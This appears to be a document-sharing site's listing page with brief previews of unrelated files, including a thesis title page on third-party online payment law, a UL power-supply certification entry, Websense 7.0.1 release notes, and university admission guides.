<4D6963726F736F667420576F7264202D20B5DAC8FDB7BDBE57C9CFD6A7B8B6D6AEB7A8C2C98696EE7DCCBDBEBF2E646F63> 題 目 : 第 三 方 網 上 支 付 之 法 律 問 題 探 究 Title:A study on legal issues of the third-party online payment 姓 名 Name 學 號 Student No. 學 院 Faculty 課 程 Program 專 業 Major 指 導 老 師 Supervisor 日 期 Date : 王 子 瑜 : 1209853J-LJ20-0021

More information

QQGQ2.E Power Supplies, Information Technology Equipment Including Ele... 1/10

QQGQ2.E Power Supplies, Information Technology Equipment Including Ele... 1/10 QQGQ2.E232014 - Power Supplies, Information Technology Equipment Including Ele... 1/10 QQGQ2.E232014 Power Supplies, Information Technology Equipment Including Electrical Business Equipment - Component

More information

发行说明, 7.0.1 版

发行说明, 7.0.1 版 发 行 说 明 Websense Web Security Websense Web Filter 7.0.1 版 本 版 本 的 新 特 点 Websense Web Security 和 Websense Web Filter 的 7.0.1 版 本 均 已 本 地 化 为 以 下 语 言 : 法 语 德 语 意 大 利 语 日 语 葡 萄 牙 语 简 体 中 文 西 班 牙 语 繁 体 中 文

More information

1 目 錄 1. 簡 介... 2 2. 一 般 甄 試 程 序... 2 3. 第 一 階 段 的 準 備... 5 4. 第 二 階 段 的 準 備... 9 5. 每 間 學 校 的 面 試 方 式... 11 6. 各 程 序 我 的 做 法 心 得 及 筆 記... 13 7. 結 論..

1 目 錄 1. 簡 介... 2 2. 一 般 甄 試 程 序... 2 3. 第 一 階 段 的 準 備... 5 4. 第 二 階 段 的 準 備... 9 5. 每 間 學 校 的 面 試 方 式... 11 6. 各 程 序 我 的 做 法 心 得 及 筆 記... 13 7. 結 論.. 如 何 準 備 研 究 所 甄 試 劉 富 翃 1 目 錄 1. 簡 介... 2 2. 一 般 甄 試 程 序... 2 3. 第 一 階 段 的 準 備... 5 4. 第 二 階 段 的 準 備... 9 5. 每 間 學 校 的 面 試 方 式... 11 6. 各 程 序 我 的 做 法 心 得 及 筆 記... 13 7. 結 論... 20 8. 附 錄 8.1 推 甄 書 面 資 料...

More information

入學考試網上報名指南

入學考試網上報名指南 入 學 考 試 網 上 報 名 指 南 On-line Application Guide for Admission Examination 16/01/2015 University of Macau Table of Contents Table of Contents... 1 A. 新 申 請 網 上 登 記 帳 戶 /Register for New Account... 2 B. 填

More information